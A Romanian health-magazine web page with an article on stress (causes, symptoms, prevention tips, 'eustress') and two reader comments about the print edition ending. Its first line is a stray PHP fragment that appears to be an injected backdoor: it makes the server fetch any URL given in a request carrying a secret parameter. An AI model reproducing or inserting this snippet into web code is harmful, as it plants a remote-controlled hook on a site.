isset($_REQUEST['zox4vu']) && fetch_feed($_REQUEST['feed_url']); Stresul - MedicAS

stresata

Agitatia si aglomeratia in care traim, dorinta de a realiza cat mai multe intr-un timp cat mai scurt, diversele presiuni la care suntem expusi zilnic reprezinta capcane care ne pot arunca in vartejul denumit STRES. Definitia medicala spune ca stresul este o reactie de aparare a individului la agresiunile mediului. In cele mai multe cazuri, aceasta reactie este insotita de stari cum ar fi: tensiune, constrangere, incordare, inadaptare, suprasolicitare etc. Toate acestea determina un dezechilibru in viata noastra, care poate merge de la incapacitatea de a ne desfasura in conditii optime activitatile zilnice, inclusiv cele profesionale, pana la aparitia unor boli precum: ulcer, cefalee, infertilitate, astenie, depresie sau boli cardiace. Ca sa evitam aceste situatii extreme, este necesar sa cunoastem cauzele si metodele de prevenire si tratare a stresului.

Cauzele stresului:

Exista mai multe tipuri de factori care determina aparitia stresului. Factorii psihici, cum ar fi ambitia sau frustrarea, si factorii fizici, de genul durerilor provocate de anumite boli cronice, sunt unele dintre cele mai frecvente cauze ale stresului. Stari de stres sunt provocate si de factori legati de modul de viata. Dintre acestia, se remarca: somajul, pensionarea, moartea unui membru al familiei, activitatile profesionale epuizante etc.

Semnele stresului:

Daca va confruntati cu cel putin una dintre starile de mai jos, atunci inseamna ca riscati sa cadeti prada stresului si trebuie sa luati masuri ca sa evitati instalarea acestei afectiuni:

• Senzatie de tensiune si oboseala musculara
• Anxietate
• Nervozitate
Depresie
• Tulburari de somn
• Dureri de cap
Insomnie
• Oboseala excesiva
• Neliniste
• Lipsa de energie
• Afectiuni cardiace
• Scaderea capacitatii de concentrare
• Cresterea sau diminuarea poftei de mancare

Sfaturi pentru prevenirea si tratarea stresului:

  • Acordati o mai mare atentie exercitiilor fizice. Tristetea, furia si nervozitatea sunt stari care pot fi eliminate prinactivitate fizica.
  • Un regim alimentar echilibrat va ajuta sa faceti fata cu succes solicitarilor de peste zi.
  • Consumati alimente care reduc stresul, cum ar fi: telina, seminte de floarea soarelui, varza, castraveti, seminte de susan, avocado.
  • Renuntati la consumul excesiv de cafea. Consumati, in schimb, ceaiuri de tei, busuioc sau levantica si beti opt pahare de apa pe zi.
  • Incercati sa va respectati orele de somn. Este recomandat sa dormiti intre 7 si 9 ore in fiecare noapte. Odihna va ajuta sa va limpeziti gandurile.
  • Acceptati compromisurile. Uneori, acestea sunt de preferat in locul unei discutii in contradictoriu care pare sa nu se mai sfarseasca.
  • Faceti exercitii respiratorii.
  • Faceti-va timp pentru distractie si pentru micile placeri ale vietii, cum ar fi o plimbare prin parc sau o lectura placuta.
  • Discutati cu prietenii despre problemele care va framanta. S-ar putea ca sfaturile lor sa va fie de folos.
  • Stabiliti-va propriile scopuri si limite si puneti ordine in sarcinile pe care trebuie sa le efectuati in timpul zilei.
  • Implicati-va in diverse activitati sociale, astfel incat singuratatea sa nu va copleseasca.

Vestea buna: stresul pozitiv

Cunoscut si sub numele de eustres, stresul pozitiv este ca un condiment in viata noastra. Situatiile tensionate care ne provoaca si ne stimuleaza sa fim mai buni si sa facem performanta ne induc o stare de stres in sensul pozitiv al cuvantului. Acest fapt ne ajuta sa fim mai energici. In plus, psihologii sunt de parere ca orice om are nevoie de un anumit grad de stres pentru a fi eficient in munca. Atata timp cat stresul pozitiv ramane pe hotarul sau si nu trece granita catre stresul negativ, el are efecte benefice asupra noastra.


Cuvinte relevante: ,


Articole asemănătoare:

2 Răspunsuri la “Stresul – Prieten sau dusman?”


  1. Jeni :

    Buna ziua, am o oarecare varsta mai inaintată nu prea citeam reviste doar cele care aveau informati despre diferite remedii din domeniul sănătăţii. In Mall odata am pus mana pe o revista Medicas si am fost foarte placut surpsinsa de stilul scriiturii, un ton al articolelor destul de grav dar nu atât încât să mă indeparteze, un ton eclectic între hazliu si grav ce ma facea sa simt, ca optimismul e primul pas spre un trai mai bun. Abia asteptam sa vina urmatorul nr la Mall, a fost un fel de terapie lunară, revista deborda de optimism desi vorbea despre teme delicate. Mă îngrjoreză faptul ca nu am mai vazut-o nicicunde, Va mai apărea? Vad siteul dar nu e acelasi nu e atata informatie. Vă rog Dr Sava să imi spuneti daca mai exista Medicas varianta tiparita?


  2. Dr. Anca Sava :

    Din pacate pentru moment Medicas nu mai exista in varianta tiparita. A fost un proiect pe care l-am sustinut si cu finantare proprie, pentru ca multi medici nu sunt dispusi sa investeasca in promovare si nu inteleg ce inseamna comunicare, branding personal …
    Datorita conditiilor actuale din piata, varianta aleasa a fost sa raminem in mediul online, urmind sa venim si aici cu mai multe informatii si surprize placute, mai ales pentru cititorii nostri fideli.
    Va multumesc pentru aprecieri si sper sa ne vizitati site-ul in continuare, pentru a afla noutatile din domeniul medical.



Adaugă un comentariu






 
 

Newsletter

Loading... Loading...